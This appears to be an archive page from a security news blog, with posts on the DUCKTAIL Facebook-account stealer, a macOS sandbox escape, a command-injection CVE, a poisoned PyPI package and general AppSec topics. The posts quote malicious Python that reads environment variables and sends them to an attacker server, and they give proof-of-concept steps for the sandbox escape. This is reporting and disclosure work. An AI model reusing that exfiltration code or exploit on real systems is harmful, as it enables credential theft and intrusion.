Researchers uncovered an ongoing operation, codenamed DUCKTAIL that targets Facebook Business and Ad Accounts.

Researchers from WithSecure (formerly F-Secure Business) have discovered an ongoing operation, named DUCKTAIL, that targets individuals and organizations that operate on Facebook’s Business and Ads platform.

Experts attribute the campaign to a Vietnamese financially motivated threat actor which is suspected to be active since 2018.

“Our investigation reveals that the threat actor has been actively developing and distributing malware linked to the DUCKTAIL operation since the latter half of 2021. Evidence suggests that the threat actor may have been active in the cybercriminal space as early as late 2018.” reads the report published by the experts.

The threat actors target individuals and employees that may have access to a Facebook Business account, they use an information-stealer malware that steals browser cookies and abuse authenticated Facebook sessions to steal information from the victim’s Facebook account.

The end goal is to hijack Facebook Business accounts managed by the victims.

The threat actors target individuals with managerial, digital marketing, digital media, and human resources roles in companies. The attackers connected the victims through LinkedIn, some of the samples observed by the experts have been hosted on file or cloud hosting services, such as Dropbox, iCloud, and MediaFire.

WithSecure researchers noticed that samples employed in the DUCKTAIL operation were written in .NET Core and were compiled using its single file feature. This feature bundles all dependent libraries and files into a single executable, it also includes the main assembly. Experts pointed out that the usage of .NET Core and its single-file feature is uncommon in malware development.

The use of .Net Core allows the attackers to embed Telegram.Bot client as well as any other external
dependencies into a single executable and use Telegram channels as Command and Control (C&C).

“Since late last year, the threat actor has shifted entirely to using Telegram as their C&C channel making use of the Telegram Bot functionality. Currently, the adversary only exfiltrates stolen information through the C&C channel and no commands are sent from the C&C to the victim’s machine other than potentially sending e-mail addresses for business hijacking purposes.” continues the report.

In order to steal Facebook session cookies from the victims, the malware scans the machine for popular browsers, including Google Chrome, Microsoft Edge, Brave Browser, and Firefox. For each of the browsers that it finds, it extracts all the stored cookies, including any Facebook session cookie.

The malware also steals information from the victim’s personal Facebook account, including name, email address, date of birth, and user ID, along with other data such as 2FA codes, user agents, IP address, and geolocation

Ducktail

Once obtained the above data, the attackers can access to the victim’s personal account, hijack it by adding their email address retrieved from the Telegram channel and grant themselves Admin and Finance editor access.

“They can edit business credit card information and financial details like transactions, invoices, account spend and payment methods. Finance editors can add businesses to your credit cards and monthly invoices. These businesses can use your payment methods to run ads.” states the report.

Countries affected by DUCKTAIL samples analyzed by the experts includes US, India, Saudi Arabia, Italy, Germany, Sweden, Finland, and the Philippines.

“WithSecure cannot determine the success, or lack thereof, that the threat actor has had in circumventing Facebook’s existing security features and hijacking businesses.” concludes the report. “However, the threat actor has continued to update and push out the malware in an attempt to improve its ability to bypass existing/new Facebook security features alongside other implemented features.”

Facebook Business administrators are recommended to check access permissions for their business accounts and remove any unknown users.

Security Manual. Whatsapp and FacebookSecurity Manual. Whatsapp and FacebookSecurity Manual. Whatsapp and Facebook

Tags: DUCKTAIL operation, Facebook security, Security Manual


Jul 14 2022

Microsoft published exploit code for a macOS App sandbox escape flaw

Category: App SecurityDISC @ 8:35 am

Microsoft publicly disclosed technical details for an access issue vulnerability, tracked as CVE-2022-26706, that resides in the macOS App Sandbox.

“Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape the App Sandbox and run unrestricted on the system.” reads the post published by Microsoft.

Microsoft reported the issue to Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) in October 2021. Apple addressed the CVE-2022-26706 flaw on May 16, 2022. 

“An access issue was addressed with additional sandbox restrictions on third-party applications. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A sandboxed process may be able to circumvent sandbox restrictions.” reads the description of this issue.

An attacker can trigger the flaw using a specially crafted Office document containing malicious macro code that allows to bypass sandbox restrictions and execute commands on the system.

The Apple App Sandbox provides protection to system resources and user data by limiting your app’s access to resources requested through entitlements.

Developers that want to distribute a macOS app through the Mac App Store must enable the App Sandbox capability.

Microsoft researchers demonstrated that using specially crafted codes could bypass the sandbox rules. An attacker could exploit the sandbox escape vulnerability to gain elevated privileges on the affected device or execute malicious commands like installing malicious payloads.

“We found the vulnerability while researching potential ways to run and detect malicious macros in Microsoft Office on macOS. For backward compatibility, Microsoft Word can read or write files with an “~$” prefix.” reads the post. “Our findings revealed that it was possible to escape the sandbox by leveraging macOS’s Launch Services to run an open –stdin command on a specially crafted Python file with the said prefix.”

The root cause of the issue is backward compatibility, which allows Microsoft Word to read and write files with the prefix “~$.” . 

The experts first created a POC exploit to create a macro that launches a shell script with the Terminal app, bit it was captured by the sandbox because it was automatically given the extended attribute com.apple.quarantine which prevents the execution by the Terminal. Then the experts tried using Python scripts, but the Python app had similar issues running files having the said attribute.

In one of the hacking attempts, the researchers created a proof-of-concept (PoC) that used the -stdin option for the open Command on a Python file to bypass the “com.apple.quarantine” extended attribute restriction. In this way, there was no way for Python to determine that the contents from its standard input originated from a quarantined file.

“Our POC exploit thus became simply as follows:

  1. Drop a “~$exploit.py” file with arbitrary Python commands.
  2. Run open –stdin=’~$exploit.py’ -a Python, which runs the Python app with our dropped file serving as its standard input. Python happily runs our code, and since it’s a child process of launchd, it isn’t bound to Word’s sandbox rules.” continues the post.
macos sandbox exploit

Exploit Code Not People

DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Ask DISC an InfoSec & compliance related question

Tags: exploit code


Jun 06 2022

Red TIM Research discovers a Command Injection with a 9,8 score on Resi

During the bug hunting activity, Red Team Research (RTR) detected 2 zero-day bugs on GEMINI-NET, a RESI Informatica solution.

It’s been detected an OS Command Injection, which has been identified from NIST as a Critical one, its score is 9,8.  This vulnerability comes from a failure to check the parameters sent as inputs into the system before they are processed by the server. 

Due to the lack of user input validation, an attacker can ignore the syntax provided by the software and inject arbitrary system commands with the user privileges of the application.

RESI S.p.A. has been for over thirty years a technological partner of the largest Italian organizations such as the Ministry of Defence, the Presidency of the Council of Ministers, the Italian Post Office, Leonardo, Ferrovie dello Stato, TIM, Italtel. Plus RESI S.p.A. Is one of the few Italian companies, that creates national technology.

Please note that patches for these specific vulnerabilities have been released by Resi.

Resi

What GEMINI-NET from Resi is

GEMINI-NET™ is a Resi product that allows active and passive monitoring of networks and communication services, used in many networks, both old and new generation. This platform is an OSS system that can be integrated, modular and scalable.

It monitors in real time all the needs related to typical network services and infrastructure issues and is able to optimize resources and data traffic on the network.

Resi

According to the institutional website https:///www.gruppotim.it/redteam, once these vulnerabilities were identified, researchers Alessandro Bosco, Fabio Romano and Stefano Scipioni immediately started the process of Coordinated Vulnerability Disclosure (CVD) with Massimiliano Brolli, leading the project, by publishing only after the availability of the fixes made by the Vendor.

Below are the details that have been published on the institutional website and NIST ratings.

CVE-2022-29539 – RESI S.p.A

  • Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection – CWE-78)
    Software Version: 4.2
    NIST
    CVSv3: 9.8
    Severity: CriticalRESI Gemini-Net 4.2 is affected by OS Command Injection. It does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, an unauthenticated attacker can bypass the syntax intended by the software (e.g., concatenate `&|;\r\ commands) and inject arbitrary system commands with the privileges of the application user.

According to the institutional website https:///www.gruppotim.it/redteam, once these vulnerabilities were identified, researchers Alessandro Bosco, Fabio Romano and Stefano Scipioni immediately started the process of Coordinated Vulnerability Disclosure (CVD) with Massimiliano Brolli, leading the project, by publishing only after the availability of the fixes made by the Vendor.

Below are the details that have been published on the institutional website and NIST ratings.

CVE-2022-29539 – RESI S.p.A

  • Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection – CWE-78)
    Software Version: 4.2
    NISThttps://nvd.nist.gov/vuln/detail/CVE-2022-29539
    CVSv3: 9.8
    Severity: CriticalRESI Gemini-Net 4.2 is affected by OS Command Injection. It does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, an unauthenticated attacker can bypass the syntax intended by the software (e.g., concatenate `&|;\r\ commands) and inject arbitrary system commands with the privileges of the application user.

We are talking about one of the few Italian centers of industrial research about security bugs, where since few years are performed “bug hunting” activities that aim to search for undocumented vulnerabilities, leading to a subsequent issuance of a Common Vulnerabilities and Exposures (CVE) on the National Vulnerability Database of the United States of America, once the Coordinated Vulnerability Disclosure (CVD) with the Vendor is over.

In two years of activity, the team has detected many 0-days on very popular products of big vendors, such as Oracle, IBM, Ericsson, Nokia, Computer Associates, Siemens, QNAP, Johnson & Control, Schneider Electric, as well as other vendors on different types of software architectures.

In two years, more than 70 CVEs have been published, 4 of them with a Critical severity (9.8 of CVSSv3 scores), 23 of them with a High severity and 36 of them with a Medium severity.

Speaking about a vulnerability detected on Johnson & Control’s Metasys Reporting Engine (MRE) Web Services Product, Cybersecurity and Infrastructure Security Agency (CISA) of the United States of America issued a specific Security Bulletin reporting as Background the following sectors: “CRITICAL INFRASTRUCTURE SECTORS, COUNTRIES/ AREAS USED and COMPANY HEADQUARTERS”.

It is an all-Italian reality that issues a CVE every 6 working days, internationally contributing to the research for undocumented vulnerabilities, and contributing to the security of the products used by many organizations and several individuals.

Secure Application Development


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: command injection, Secure Application Development


May 25 2022

Poisoned Python and PHP packages purloin passwords for AWS access

Category: App SecurityDISC @ 9:18 am

A keen-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source software modules in Python and PHP.

Following on-line discussions about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPi repository had suddenly received an “update”, despite not otherwise being touched since late 2014.

In theory, of course, there’s nothing wrong with old packages suddenly coming back to life.

Sometimes, developers return to old projects when a lull in their regular schedule (or a guilt-provoking email from a long-standing user) finally gives them the impetus to apply some long-overdue bug fixes.

In other cases, new maintainers step up in good faith to revive “abandonware” projects.

But packages can become victims of secretive takeovers, where the password to the relevant account is hacked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.

Simply put, some package “revivals” are conducted entirely in bad faith, to give cybercriminals a vehicle for pushing out malware under the guise of “security updates” or “feature improvements”.

The attackers aren’t necessarily targeting any specific users of the package they compromise – often, they’re simply watching and waiting to see if anyone falls for their package bait-and-switch…

…at which point they have a way to target the users or companies that do.

New code, old version number

In this attack, Yee Ching Tok noticed that altough the package suddenly got updated, its version number didn’t change, presumably in the hope that some people might [a] take the new version anyway, perhaps even automatically, but [b] not bother to look for differences in the code.

But a diff (short for difference, where only new, changed or deleted lines in the code are examined) showed added lines of Python code like this:

if environ.get('AWS_ACCESS_KEY_ID') is not None:self.secret = environ.get('AWS_ACCESS_KEY_ID')

You may remember, from the infamous Log4Shell bug, that so-called environment variables, accessible via os.environ in Python, are memory-only key=value settings associated with a specific running program.

Data that’s presented to a program via a memory block doesn’t need to be written to disk, so this is a handy way of passing across secret data such as encryption keys while guarding against saving the data improperly by mistake.

However, if you can poison a running program, which will already have access to the memory-only process environment, you can read out the secrets for yourself and steal the, for example by sending them out buried in regular-looking network traffic.

If you leave the bulk of the source code you’re poisoning untouched, its usual functions will still work as before, and so the malevolent tweaks in the package are likely to go unnoticed.

Why now?

Apparently, the reason this package was attacked only recently is that the server name used for email by the original maintainer had just expired.

The attackers were therefore able to buy up the now-unused domain name, set up an email server of their own, and reset the password on the account.

Interestingly, the poisoned ctx package was soon updated twice more, with more added “secret sauce” squirrelled away in the infected code, this time including more aggressive data-stealing code.

The requests.get() line below connects to an external server controlled by the crooks, though we have redacted the domain name here:

def sendRequest(self):str = ""for _, v in environ.items():str += v + " " ### --encode string into base64 resp = requests.get("https://[REDACTED]/hacked/" + str)

The redacted exfiltration server will receive the encoded environment variables (including any stolen data such as access keys) as an innocent-looking string of random-looking data at the end of the URL.

The response that comes back doesn’t actually matter, because it’s the outgoing request, complete with appended secret data, that the attackers are after.

If you want to try this for yourself, you can create a standalone Python program based on the pseudocode above, such as this::

Then start a listening HTTP pseudoserver in a separate window (we used the excellent ncat utility from the Nmap toolkit, as seen below), and run the Python code.

Here, we’re in the Bash shell, and we have used env -i to strip down the environment variables to save space, and we’ve run the Python exfiltration script with a fake AWS environment variable set (the access key we chose is one of Amazon’s own deliberately non-functional examples used for documentation)

Full Stack Python Security: Cryptography, TLS, and attack resistance

Pro PHP Security: From Application Security Principles to the Implementation of XSS Defenses (Expert’s Voice in Open Source)

👇 Please Follow our LI page…


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: PHP, Python, Python and PHP packages


May 04 2022

Do You Need to Rethink AppSec With 5G?

Category: App Security,Wi-Fi SecurityDISC @ 8:55 am

It’s not quite everywhere yet, but 5G connectivity is growing rapidly. That’s a great thing for remote workers and anyone depending on a fast connection, but what kind of impact will 5G have on application security?

“The explosion of 5G is only going to put more pressure on teams to harden their application security practice,” said Mark Lambert, vice president of products at ArmorCode, via email. The reason is the increase in the attack surface.

More devices with high bandwidth will be connecting to your network systems and services. At the same time, Lambert pointed out, business leaders are demanding an increase in the pace of software delivery. As 5G use becomes the norm, so does the risk of apps without the security to support faster connectivity.

“Application security teams need ways to quickly identify vulnerabilities within the DevSecOps pipeline and collaborate with development teams to escalate remediation,” said Lambert.

The IoT Dilemma

5G will accelerate the use of IoT devices, which in turn will accelerate app development for IoT devices. Based on the lack of priority for security in the application development process today, there is no indication that IoT software will be designed to handle the challenges of 5G security in the future. And there will be challenges.

The 5G systems won’t just connect phones, sensors and software to the internet. “On a high level, a 5G system comprises a device connected to a 5G access network which, in turn, is connected to the rest of the system called a 5G core network,” according to a whitepaper from Ericsson.

So, it won’t simply be all the new connections that are expanding the attack surface and creating an increased application security risk, but also the change in how 5G connects to the network. Rather than the one-way network that was in place under 4G, 5G brings a two-way communication capability, and, according to a Cyrex blog post, would “be linked in this two-way network and effectively would be public to those with the skills to exploit the link.”

5G, AppSec and the Cloud

Expect to see 5G lead to an increase in the adoption of cloud applications, said Kevin Dunne, president at Pathlock, in an email interview.

“Increased connectivity and connection speeds from anywhere will drive companies to invest in infrastructure that can be accessed from anywhere,” said Dunne. “Providing accessible applications will increase employee productivity, but it will also introduce new threats. With critical resources now on the public network, bad actors can access them from anywhere, increasing the number of threats to sensitive data and business processes.”

IT security teams will need to shift their focus from network-based perimeter protection to more modern approaches that look beyond what users can do in an application to what they are doing, Dunne added. “This helps to defend against modern attacks like phishing and ransomware which are increasingly common in cloud environments.”

It’s not all gloom and doom for 5G and application security. 5G can enhance app security, allowing developers to create more intelligent software and allowing them to use virtual hardware. 5G can also improve identity management and authentication that will make it more difficult for threat actors to infiltrate applications.

5G is expected to transform business reliance on IoT devices and cloud applications. Expect new threats and risks to go hand-in-hand with the innovations that 5G brings. Those responsible for application security will need to prepared with cybersecurity systems that will adapt to those threats.

5G SASE Security

5G Wireless: A Comprehensive Introduction

👇 Please Follow our LI page…


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: 5G security, 5G Wireless, AppSec


Apr 18 2022

Trans-Atlantic Data Privacy Framework’s Impact on AppSec

Earlier this year, the White House announced that it is working with the European Union on a Trans-Atlantic Data Privacy Framework. According to a White House statement, this framework will “reestablish an important legal mechanism for transfers of EU personal data to the United States. The United States has committed to implement new safeguards to ensure that signals intelligence activities are necessary and proportionate in the pursuit of defined national security objectives, which will ensure the privacy of EU personal data and to create a new mechanism for EU individuals to seek redress if they believe they are unlawfully targeted by signals intelligence activities.”

This is encouraging news. As The National Law Review pointed out, the EU had concerns about the protection of their citizens’ data from U.S. government surveillance. But it may also be the push needed to advance greater data privacy protections in America.

“The joint statement references the U.S. putting in place ‘new safeguards’ to ensure that intelligence activities are ‘necessary and proportionate’, the definition and practical application of which will be one of the things that privacy campaigners will be looking at closely when the detailed text is drafted and made available,” said Stephen Bailey of NCC Group in an email comment.

Data Privacy and AppSec

The world runs on apps, so it is necessary to look at how the Trans-Atlantic Data Privacy Framework will impact app development and app security.

“For application developers, the single biggest challenge to complying with increasingly rigorous data protection frameworks is getting control of their data, particularly sensitive and personally identifiable information,” explained Chris McLellan, director of operations at the nonprofit Data Collaboration Alliance.

Today, every new app, whether bought or built, traps data in a silo, which can only be connected through the exchange of copies or point-to-point data integration.

“These copies make it incredibly difficult—and in some cases, even impossible—to support GDPR outcomes like ubiquitous data access controls, portability, custodianship, deletion (the right to be forgotten) and precision auditability: Things that could potentially, although they’re unlikely to, be included in the post-Privacy Shield framework. But they are definitely looming on the horizon both internationally and domestically, for example, in California and Utah,” said McLellan.

As data privacy frameworks become more common and we begin to see more joint efforts internationally, organizations have to think about how they share and store data in the future, taking compliance requirements into greater consideration.

Organizations need to get more serious about minimizing their use of data and start implementing strategies that introduce real control to the data they manage, McLellan says. They should be exploring ways now to eliminate data silos and copies that have resulted in rampant data proliferation.

data privacy shield security remote work

No Quick Fixes

But, as McLellan pointed out, there are no quick fixes. Unwinding years of “an app for everything and a database for every app” mantra will be difficult, and McLellan believes this is best approached in two stages.

Stage One: Immediately treat the symptoms of data proliferation by evaluating and adopting privacy-enhancing technologies that help organizations anonymize and encrypt data, and better manage consent. “They should also investigate the potential to adopt first-party and zero-party data collection practices that redirect customer and other sensitive data away from the third-party apps (e.g. Google Analytics), over which they have no control,” McLellan explained. “Organizations should also adopt processes and workflows that help them establish ‘purpose-based’ data access requests.”

Stage Two: Organizations should explore ways to address the root causes of data proliferation. Everyone within the organization’s technology teams—CIO, CDO, application development, data and IT teams—should familiarize themselves with emerging frameworks like zero-copy integration, a framework that is on track to become a national standard in Canada.

“It’s the evolution of privacy-by-design and signals the beginning of the end for application-specific data silos and copy-based data integration. Such frameworks are made possible by new categories of technology, including data fabrics, dataware and blockchain that support ‘zero copy’ digital innovation. Many leading organizations, particularly in finance and health care, are already ahead of the curve in adopting this approach,” said McLellan.

Data protection regulations at home and abroad reflect a burgeoning global trend toward citizens and consumers gaining greater control and ownership of data as its rightful owner.

“These regulatory shifts,” said McLellan, “will need to be met by an equally significant shift in how U.S. businesses manage data and build new applications if there’s any hope to comply with new laws as they’re passed.”

Data Privacy: A runbook for engineers

👇 Please Follow our LI page…


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: Data Privacy Framework, Data privacy runbook


Apr 11 2022

Burp Suite overview

Category: App Security,Web SecurityDISC @ 11:29 am
Credit: SecurityZines

Burpsuite, the proxy-based tool used to evaluate the security of web-based applications and do hands-on testing developed by PortSwigger. It is one of the most popular penetration testing and vulnerability finder tools and is often used for checking web application security.

Web App Security

👇 Please Follow our LI page…

Tags: burp suite, web app security


Feb 28 2022

Take a dev-centric approach to cloud-native AppSec testing

Category: App Security,Information SecurityDISC @ 10:09 am

While some applications are still being built on a monolithic (all-in-one) architecture – i.e., all components in a single code base, on a single server, connected to the internet – an increasing number of them is now based on the microservices architecture, with each application microservice a self-contained functionality, “housed” in a container managed by an orchestrator like Kubernetes, deployed on the cloud (public or private), and communicating with other application microservices over the network in runtime.

But with applications no longer self-contained, security vulnerabilities are no longer present just in the code; vulnerabilities can “start” on one microservice, go through multiple components, and “finish” on a different microservice.

“We are no longer dealing with just vulnerabilities, but also with vulnerable flows between microservices. On top of that, as cloud-native applications are built on multiple infrastructure layers – the container, the cluster, and the cloud – they way these layers are configured affects what a hacker can do with these vulnerabilities,” notes Ron Vider, one of the co-founders and the CTO of Oxeye.

Modern architectures require modern AppSec testing solutions

This dramatic change in how applications are structured has made traditional approaches to application security ineffectual and has created security blind spots for AppSec and DevOps teams.

“Old-school” software composition analysis (SCA) and static, dynamic, and interactive application security testing (SAST, DAST, IAST) tools are run independently, are not synchronized with one another, and are unable to cross-reference and use enriched data from other code layers in the environment. The incomplete and inaccurate results they provide when testing cloud-native apps have made it obvious that a new approach and new, better tools are needed.

cloud-native AppSec testing

Oxeye is one such tool. It essentially combines all AST methodologies with a new generation of security control assessment capabilities and, as a result, excels in finding and correctly prioritizing vulnerabilities in cloud-native applications that need to be addressed. It helps clear the noise of false positives/negatives delivered by legacy solutions, and allows developers and AppSec teams to focus on high-risk, critical vulnerabilities.

Getting started with Oxeye is fantastically easy: you need to deploy a single component (Oxeye Observer) into your staging or testing environment, and you do it by using a single YAML file containing its definitions.

cloud-native AppSec testing

“The Oxeye Observer immediately starts running within the cluster and starts it automatic discovery process,” Vider told Help Net Security.

“First it analyzes the infrastructure to understand how the application is configured, and it does that by communicating with the with the Docker API, the containerd API, the Kubernetes API and the cloud provider API, and fetching the relevant configuration. Then, it detects potential vulnerabilities in the code (the application’s code and the third-party components). Next, it analyzes the communication between the different components and traces their flow. Finally, it validates the found vulnerabilities by sending payloads to the application and analyzing its behavior, to understand whether it’s exploitable or not.”

More on analysis of Oxeye…

The Self-Taught Software Tester A Step By Step Guide to Learn Software Testing Using Real-Life Project

Tags: AppSec, AppSec testing


Next Page »